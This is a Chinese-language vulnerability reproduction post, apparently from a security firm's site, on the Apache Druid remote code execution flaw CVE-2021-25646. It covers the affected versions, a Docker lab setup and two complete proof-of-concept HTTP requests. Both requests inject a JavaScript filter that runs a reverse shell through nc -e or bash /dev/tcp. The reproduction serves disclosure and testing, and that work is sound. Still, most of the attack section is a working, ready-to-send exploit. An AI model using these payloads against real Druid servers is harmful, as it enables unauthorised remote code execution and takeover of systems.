远程代码执行漏洞 (CVE-2021-25646)复现过程

发布时间:2021-02-09      来源:

  漏洞概要

  Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。

  Apache Druid 默认情况下缺乏授权认证,攻击者可以发送特制请求,利用Druid服务器上进程的特权执行任意代码。
 

  影响范围

  影响版本: Apache Druid < 0.20.1

  安全版本: Apache Druid 0.20.1
 

  环境搭建

  github.com/apache/druid/

  druid.apache.org/docs/latest/tutorials/index

  下载0.19版本

  github.com/apache/druid/releases/tag/druid-0.19.0

  解压

  cd druid-druid-0.19.0-rc1\distribution\docker

  docker-compose up -d

  打开 192.168.123.10:8888


 

  漏洞复现

  Poc1:通用

  POST /druid/indexer/v1/sampler HTTP/1.1

  Host: 192.168.123.10:8888

  Accept: application/json, text/plain, */*

  DNT: 1

  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36

  Referer: 192.168.123.10:8888/unified-console.html

  Accept-Encoding: gzip, deflate

  Accept-Language: zh-CN,zh;q=0.9

  Content-Type: application/json

  Connection: close

  Content-Length: 1007

  {"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{\"isRobot\":true,\"channel\":\"#x\",\"timestamp\":\"2020-12-12T12:10:21.040Z\",\"flags\":\"x\",\"isUnpatrolled\":false,\"page\":\"1\",\"diffUrl\":\"https://xxx.com\",\"added\":1,\"comment\":\"Botskapande Indonesien omdirigering\",\"commentLength\":35,\"isNew\":true,\"isMinor\":false,\"delta\":31,\"isAnonymous\":true,\"user\":\"Lsjbot\",\"deltaBucket\":0,\"deleted\":0,\"namespace\":\"Main\"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec('nc 192.168.123.10 5555 -e /bin/sh')}", "": {"enabled": true}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}

  注意:因为是docker环境没有bash,这里直接采用nc -e反弹

  Poc2:通用

  POST /druid/indexer/v1/sampler?for=example-manifest HTTP/1.1

  Host: 0.0.0.0:8888

  Content-Length: 1005

  Accept: application/json, text/plain, */*

  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36

  DNT: 1

  Content-Type: application/json;charset=UTF-8

  Accept-Encoding: gzip, deflate

  Accept-Language: zh-CN,zh;q=0.9

  Connection: close

  {"type":"index","spec":{"type":"index","ioConfig":{"type":"index","inputSource":{"type":"http","uris":["https://druid.apache.org/data/example-manifests.tsv"]},"inputFormat":{"type":"tsv","findColumnsFromHeader":true}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"timestamp","missingValue":"2010-01-01T00:00:00Z"},"dimensionsSpec":{},"transformSpec":{"transforms":[],"filter":{"type": "javascript",

  "function": "function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/0.0.0.0/5555 0>&1')}",

  "dimension": "added",

  "": {

  "enabled": "true"

  }

  }

  }

  },"type":"index","tuningConfig":{"type":"index"}},"samplerConfig":{"numRows":50,"timeoutMs":10000}}


 

  修复建议

  升级至安全版本及其以上。

上一篇:什么是CVE-2021-3156 Sudo溢出漏洞?
下一篇: 如何破解Js文件

武汉网盾科技有限公司 版权所有

公司地址:湖北省武汉市东湖高新技术开发区光谷大道70号现代光谷世贸中心A栋23楼

咨询电话:027-87315211     13476091025

鄂ICP备07009628号-20